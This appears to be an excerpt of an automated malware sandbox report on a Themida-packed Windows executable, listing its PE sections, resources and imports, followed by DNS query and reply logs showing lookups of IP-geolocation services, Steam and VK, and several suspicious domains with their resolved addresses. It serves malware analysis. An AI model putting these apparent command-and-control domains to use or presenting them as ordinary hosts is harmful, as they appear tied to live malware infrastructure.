	0x1000	0x9ca000	0x26c600	27cf2c909f7b300fb4d18799f04faa46	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x9cb000	0xce8	0x800	0dca9fb596578cafc161ff73da5fe32e	False	0.88037109375	data	7.280076261857407	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x9cc000	0x1c344	0x1c400	c7d3964b18526e3be2cdc85967678ef2	False	0.7422134264380531	data	7.004603762200516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x9e9000	0x1000	0x200	acb85fa52caf236dca9f09a6f814f9a5	False	0.40625	data	3.192461412359317	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x9ea000	0x1000	0x200	a72ef0d94fac75f42bae2af65140f6d5	False	0.052734375	data	0.26425924870095685	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.themida	0x9eb000	0x41a000	0x41a000	5d57b644cde351d5dea8efee392271b4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name	RVA	Size	Type	ZLIB Complexity
MUI	0x9cc088	0x110	data	0.5551470588235294
WEVT_TEMPLATE	0x225ad4	0x4f2	data	1.0086887835703002
RT_BITMAP	0x225fc8	0x1246e	data	1.0004140952686276
RT_BITMAP	0x238438	0x1246e	data	1.0004140952686276
RT_BITMAP	0x24a8a8	0x1246e	data	1.0004140952686276
RT_BITMAP	0x25cd18	0x1246e	data	0.9958416892768668
RT_BITMAP	0x26f188	0x1246e	empty	0
RT_BITMAP	0x2815f8	0x1246e	empty	0
RT_BITMAP	0x293a68	0x27c0	empty	0
RT_BITMAP	0x296228	0x27c0	empty	0
RT_BITMAP	0x2989e8	0x37b0	empty	0
RT_BITMAP	0x29c198	0x37b0	empty	0
RT_BITMAP	0x29f948	0x1246e	empty	0
RT_BITMAP	0x2b1db8	0x1246e	empty	0
RT_BITMAP	0x2c4228	0x1246e	empty	0
RT_BITMAP	0x2d6698	0x1246e	empty	0
RT_BITMAP	0x2e8b08	0x120d2	empty	0
RT_BITMAP	0x2fabdc	0x1246e	empty	0
RT_BITMAP	0x30d04c	0x7ef6	empty	0
RT_BITMAP	0x314f44	0x39e	empty	0
RT_BITMAP	0x3152e4	0x332	empty	0
RT_BITMAP	0x315618	0x247a	empty	0
RT_BITMAP	0x317a94	0x552	empty	0
RT_BITMAP	0x317fe8	0x2462	empty	0
RT_BITMAP	0x31a44c	0x1246e	empty	0
RT_BITMAP	0x32c8bc	0x1246e	empty	0
RT_BITMAP	0x33ed2c	0x28e36	empty	0
RT_BITMAP	0x367b64	0x7ef6	empty	0
RT_BITMAP	0x36fa5c	0x33f2	empty	0
RT_BITMAP	0x372e50	0x33da	empty	0
RT_ICON	0x9cc7f4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.5295497185741088
RT_ICON	0x9cd8c4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.41692253188474254
RT_ICON	0x9d1b14	0xef13	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9999836609316537
RT_ICON	0x9e0a50	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	0.34817073170731705
RT_ICON	0x9e10e0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	0.41801075268817206
RT_ICON	0x9e13f0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	0.5266393442622951
RT_ICON	0x9e1600	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	0.5675675675675675
RT_ICON	0x9e1750	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.4400319829424307
RT_ICON	0x9e2620	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.5040613718411552
RT_ICON	0x9e2ef0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.5852534562211982
RT_ICON	0x9e35e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.3106936416184971
RT_ICON	0x9e3b70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.4571576763485477
RT_ICON	0x9e6140	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.47912757973733583
RT_ICON	0x9e7210	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.7172131147540983
RT_ICON	0x9e7bc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.4875886524822695
RT_GROUP_ICON	0x9e8070	0x30	data	0.875
RT_GROUP_ICON	0x9e80c8	0xae	data	0.5919540229885057
RT_MANIFEST	0x9e81b8	0x18a	ASCII text	0.4949238578680203

DLL	Import
kernel32.dll	GetModuleHandleA
KERNEL32	GetModuleHandleA
USER32.dll	GetCursorPos
ADVAPI32.dll	RegCloseKey
SHELL32.dll	SHGetFolderPathA
ole32.dll	CoCreateInstance
OLEAUT32.dll	VariantClear

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 09:41:59.112571955 CEST	192.168.2.4	1.1.1.1	0x51e8	Standard query (0)	api.myip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:41:59.857784033 CEST	192.168.2.4	1.1.1.1	0xa5a9	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.386564970 CEST	192.168.2.4	1.1.1.1	0x7a63	Standard query (0)	f.alie3ksggg.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.388210058 CEST	192.168.2.4	1.1.1.1	0xcade	Standard query (0)	lop.foxesjoy.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.393130064 CEST	192.168.2.4	1.1.1.1	0xecd	Standard query (0)	vk.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.395373106 CEST	192.168.2.4	1.1.1.1	0xd678	Standard query (0)	monoblocked.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.397298098 CEST	192.168.2.4	1.1.1.1	0x6b58	Standard query (0)	fleur-de-lis.sbs	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.399480104 CEST	192.168.2.4	1.1.1.1	0xd95b	Standard query (0)	kurd.computer	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:07.704773903 CEST	192.168.2.4	1.1.1.1	0x740f	Standard query (0)	f.123654987.xyz	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:13.192760944 CEST	192.168.2.4	1.1.1.1	0x7fd8	Standard query (0)	sun6-23.userapi.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:13.204387903 CEST	192.168.2.4	1.1.1.1	0x9ad1	Standard query (0)	sun6-21.userapi.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:14.305799961 CEST	192.168.2.4	1.1.1.1	0xd6bd	Standard query (0)	sun6-22.userapi.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:15.380117893 CEST	192.168.2.4	1.1.1.1	0xbacf	Standard query (0)	sun6-20.userapi.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.283370018 CEST	192.168.2.4	1.1.1.1	0x5379	Standard query (0)	sta.alie3ksgee.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.484360933 CEST	192.168.2.4	1.1.1.1	0xd17f	Standard query (0)	iplis.ru	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.508925915 CEST	192.168.2.4	1.1.1.1	0xc226	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:23.271953106 CEST	192.168.2.4	1.1.1.1	0xca68	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:23.802958965 CEST	192.168.2.4	1.1.1.1	0x2fab	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:26.164978981 CEST	192.168.2.4	1.1.1.1	0x285d	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:27.142517090 CEST	192.168.2.4	1.1.1.1	0xbbb1	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:33.148484945 CEST	192.168.2.4	1.1.1.1	0x789c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:33.148587942 CEST	192.168.2.4	1.1.1.1	0x6394	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 24, 2024 09:42:38.320863962 CEST	192.168.2.4	1.1.1.1	0x179d	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:38.320971012 CEST	192.168.2.4	1.1.1.1	0xed2d	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
May 24, 2024 09:42:42.854271889 CEST	192.168.2.4	1.1.1.1	0xbe33	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:42.854387999 CEST	192.168.2.4	1.1.1.1	0x85d8	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 24, 2024 09:42:50.477977991 CEST	192.168.2.4	1.1.1.1	0xbe4b	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:50.478172064 CEST	192.168.2.4	1.1.1.1	0x6683	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
May 24, 2024 09:42:50.590851068 CEST	192.168.2.4	1.1.1.1	0xd765	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.949836016 CEST	192.168.2.4	1.1.1.1	0xbd13	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.950216055 CEST	192.168.2.4	1.1.1.1	0xd4f5	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
May 24, 2024 09:42:53.950519085 CEST	192.168.2.4	1.1.1.1	0xa587	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.950625896 CEST	192.168.2.4	1.1.1.1	0x3eb6	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
May 24, 2024 09:42:53.960333109 CEST	192.168.2.4	1.1.1.1	0x95c9	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.960524082 CEST	192.168.2.4	1.1.1.1	0x9ed0	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
May 24, 2024 09:42:55.662404060 CEST	192.168.2.4	1.1.1.1	0xdaa6	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:57.843831062 CEST	192.168.2.4	1.1.1.1	0x7858	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:58.503323078 CEST	192.168.2.4	1.1.1.1	0xe355	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:58.907804966 CEST	192.168.2.4	1.1.1.1	0x9173	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:59.603488922 CEST	192.168.2.4	1.1.1.1	0x6281	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:05.208138943 CEST	192.168.2.4	1.1.1.1	0x4957	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:09.823460102 CEST	192.168.2.4	1.1.1.1	0x689a	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:11.549228907 CEST	192.168.2.4	1.1.1.1	0x664b	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:11.715235949 CEST	192.168.2.4	1.1.1.1	0xd287	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.479620934 CEST	192.168.2.4	1.1.1.1	0xf20b	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.563550949 CEST	192.168.2.4	1.1.1.1	0x664b	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.681144953 CEST	192.168.2.4	1.1.1.1	0x32b9	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.564080954 CEST	192.168.2.4	1.1.1.1	0x664b	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:15.489283085 CEST	192.168.2.4	1.1.1.1	0x922d	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:16.309954882 CEST	192.168.2.4	1.1.1.1	0x3233	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:17.012443066 CEST	192.168.2.4	1.1.1.1	0xbb91	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:21.632132053 CEST	192.168.2.4	1.1.1.1	0xdae6	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:25.242086887 CEST	192.168.2.4	1.1.1.1	0x3c7b	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:39.684457064 CEST	192.168.2.4	1.1.1.1	0xb9a9	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:42.632425070 CEST	192.168.2.4	1.1.1.1	0x57b4	Standard query (0)	service-domain.xyz	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:42.634660006 CEST	192.168.2.4	1.1.1.1	0x8278	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:43.617868900 CEST	192.168.2.4	1.1.1.1	0xfaf9	Standard query (0)	helsinki-dtc.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:43.618777990 CEST	192.168.2.4	1.1.1.1	0xc47c	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.356319904 CEST	192.168.2.4	1.1.1.1	0x318b	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.649970055 CEST	192.168.2.4	1.1.1.1	0x6143	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.954710960 CEST	192.168.2.4	1.1.1.1	0x19fa	Standard query (0)	skrptfiles.tracemonitors.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:49.052125931 CEST	192.168.2.4	1.1.1.1	0x63cd	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:50.410721064 CEST	192.168.2.4	1.1.1.1	0x1a52	Standard query (0)	api4.check-data.xyz	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 09:41:59.120532990 CEST	1.1.1.1	192.168.2.4	0x51e8	No error (0)	api.myip.com		172.67.75.163	A (IP address)	IN (0x0001)	false
May 24, 2024 09:41:59.120532990 CEST	1.1.1.1	192.168.2.4	0x51e8	No error (0)	api.myip.com		104.26.9.59	A (IP address)	IN (0x0001)	false
May 24, 2024 09:41:59.120532990 CEST	1.1.1.1	192.168.2.4	0x51e8	No error (0)	api.myip.com		104.26.8.59	A (IP address)	IN (0x0001)	false
May 24, 2024 09:41:59.896610022 CEST	1.1.1.1	192.168.2.4	0xa5a9	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.441221952 CEST	1.1.1.1	192.168.2.4	0xecd	No error (0)	vk.com		93.186.225.194	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.441221952 CEST	1.1.1.1	192.168.2.4	0xecd	No error (0)	vk.com		87.240.132.67	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.441221952 CEST	1.1.1.1	192.168.2.4	0xecd	No error (0)	vk.com		87.240.132.72	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.441221952 CEST	1.1.1.1	192.168.2.4	0xecd	No error (0)	vk.com		87.240.132.78	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.441221952 CEST	1.1.1.1	192.168.2.4	0xecd	No error (0)	vk.com		87.240.129.133	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.441221952 CEST	1.1.1.1	192.168.2.4	0xecd	No error (0)	vk.com		87.240.137.164	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.450925112 CEST	1.1.1.1	192.168.2.4	0x6b58	No error (0)	fleur-de-lis.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.450925112 CEST	1.1.1.1	192.168.2.4	0x6b58	No error (0)	fleur-de-lis.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.473989010 CEST	1.1.1.1	192.168.2.4	0xcade	No error (0)	lop.foxesjoy.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.473989010 CEST	1.1.1.1	192.168.2.4	0xcade	No error (0)	lop.foxesjoy.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.527553082 CEST	1.1.1.1	192.168.2.4	0xd95b	No error (0)	kurd.computer		146.70.56.165	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.564347982 CEST	1.1.1.1	192.168.2.4	0xd678	No error (0)	monoblocked.com		45.130.41.108	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:04.779527903 CEST	1.1.1.1	192.168.2.4	0x7a63	No error (0)	f.alie3ksggg.com		103.146.158.221	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:07.811312914 CEST	1.1.1.1	192.168.2.4	0x740f	No error (0)	f.123654987.xyz		37.221.125.202	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:13.206985950 CEST	1.1.1.1	192.168.2.4	0x7fd8	No error (0)	sun6-23.userapi.com		95.142.206.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:13.227674007 CEST	1.1.1.1	192.168.2.4	0x9ad1	No error (0)	sun6-21.userapi.com		95.142.206.1	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:14.317687035 CEST	1.1.1.1	192.168.2.4	0xd6bd	No error (0)	sun6-22.userapi.com		95.142.206.2	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:15.291064978 CEST	1.1.1.1	192.168.2.4	0x4d21	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:15.291064978 CEST	1.1.1.1	192.168.2.4	0x4d21	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:15.389199972 CEST	1.1.1.1	192.168.2.4	0xbacf	No error (0)	sun6-20.userapi.com		95.142.206.0	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:15.805856943 CEST	1.1.1.1	192.168.2.4	0x607a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:15.805856943 CEST	1.1.1.1	192.168.2.4	0x607a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.516330004 CEST	1.1.1.1	192.168.2.4	0xc226	No error (0)	steamcommunity.com		104.102.42.29	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.631264925 CEST	1.1.1.1	192.168.2.4	0x5379	No error (0)	sta.alie3ksgee.com		103.146.158.221	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.631278992 CEST	1.1.1.1	192.168.2.4	0xd17f	No error (0)	iplis.ru		172.67.147.32	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:22.631278992 CEST	1.1.1.1	192.168.2.4	0xd17f	No error (0)	iplis.ru		104.21.63.150	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:23.283317089 CEST	1.1.1.1	192.168.2.4	0xca68	No error (0)	api.2ip.ua		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:23.283317089 CEST	1.1.1.1	192.168.2.4	0xca68	No error (0)	api.2ip.ua		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:23.846091032 CEST	1.1.1.1	192.168.2.4	0x2fab	No error (0)	iplogger.org		172.67.132.113	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:23.846091032 CEST	1.1.1.1	192.168.2.4	0x2fab	No error (0)	iplogger.org		104.21.4.208	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:26.175570011 CEST	1.1.1.1	192.168.2.4	0x285d	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:27.198939085 CEST	1.1.1.1	192.168.2.4	0xbbb1	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:27.198939085 CEST	1.1.1.1	192.168.2.4	0xbbb1	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:27.198939085 CEST	1.1.1.1	192.168.2.4	0xbbb1	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:33.172822952 CEST	1.1.1.1	192.168.2.4	0x6394	No error (0)	www.google.com			65	IN (0x0001)	false
May 24, 2024 09:42:33.172847986 CEST	1.1.1.1	192.168.2.4	0x789c	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:38.328141928 CEST	1.1.1.1	192.168.2.4	0x179d	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:38.383357048 CEST	1.1.1.1	192.168.2.4	0xed2d	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:42.864650965 CEST	1.1.1.1	192.168.2.4	0xbe33	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:42.915296078 CEST	1.1.1.1	192.168.2.4	0x85d8	No error (0)	www.google.com			65	IN (0x0001)	false
May 24, 2024 09:42:50.548192978 CEST	1.1.1.1	192.168.2.4	0xbe4b	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:50.548192978 CEST	1.1.1.1	192.168.2.4	0xbe4b	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:50.548204899 CEST	1.1.1.1	192.168.2.4	0x6683	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:50.631598949 CEST	1.1.1.1	192.168.2.4	0xd765	No error (0)	employhabragaomlsp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:50.631598949 CEST	1.1.1.1	192.168.2.4	0xd765	No error (0)	employhabragaomlsp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:51.849487066 CEST	1.1.1.1	192.168.2.4	0x5bde	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:51.849487066 CEST	1.1.1.1	192.168.2.4	0x5bde	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:51.849495888 CEST	1.1.1.1	192.168.2.4	0x6056	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:42:53.959652901 CEST	1.1.1.1	192.168.2.4	0xbd13	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.959652901 CEST	1.1.1.1	192.168.2.4	0xbd13	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.964385033 CEST	1.1.1.1	192.168.2.4	0xa587	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.964385033 CEST	1.1.1.1	192.168.2.4	0xa587	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.964431047 CEST	1.1.1.1	192.168.2.4	0x3eb6	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
May 24, 2024 09:42:53.964473963 CEST	1.1.1.1	192.168.2.4	0xd4f5	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
May 24, 2024 09:42:53.974301100 CEST	1.1.1.1	192.168.2.4	0x95c9	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.974301100 CEST	1.1.1.1	192.168.2.4	0x95c9	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:53.974347115 CEST	1.1.1.1	192.168.2.4	0x9ed0	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
May 24, 2024 09:42:55.719293118 CEST	1.1.1.1	192.168.2.4	0xdaa6	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:57.858294010 CEST	1.1.1.1	192.168.2.4	0x7858	No error (0)	employhabragaomlsp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:57.858294010 CEST	1.1.1.1	192.168.2.4	0x7858	No error (0)	employhabragaomlsp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:58.527718067 CEST	1.1.1.1	192.168.2.4	0xe355	No error (0)	api.2ip.ua		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:58.527718067 CEST	1.1.1.1	192.168.2.4	0xe355	No error (0)	api.2ip.ua		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:58.919404984 CEST	1.1.1.1	192.168.2.4	0x9173	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:59.630999088 CEST	1.1.1.1	192.168.2.4	0x6281	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:59.630999088 CEST	1.1.1.1	192.168.2.4	0x6281	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
May 24, 2024 09:42:59.630999088 CEST	1.1.1.1	192.168.2.4	0x6281	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:05.227582932 CEST	1.1.1.1	192.168.2.4	0x4957	No error (0)	employhabragaomlsp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:05.227582932 CEST	1.1.1.1	192.168.2.4	0x4957	No error (0)	employhabragaomlsp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:09.834055901 CEST	1.1.1.1	192.168.2.4	0x689a	No error (0)	api.2ip.ua		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:09.834055901 CEST	1.1.1.1	192.168.2.4	0x689a	No error (0)	api.2ip.ua		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:11.722302914 CEST	1.1.1.1	192.168.2.4	0xd287	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.555511951 CEST	1.1.1.1	192.168.2.4	0xf20b	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.555511951 CEST	1.1.1.1	192.168.2.4	0xf20b	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.555511951 CEST	1.1.1.1	192.168.2.4	0xf20b	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.733130932 CEST	1.1.1.1	192.168.2.4	0x32b9	No error (0)	employhabragaomlsp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:12.733130932 CEST	1.1.1.1	192.168.2.4	0x32b9	No error (0)	employhabragaomlsp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		125.7.253.10	A (IP address)	IN (0x0001)	false
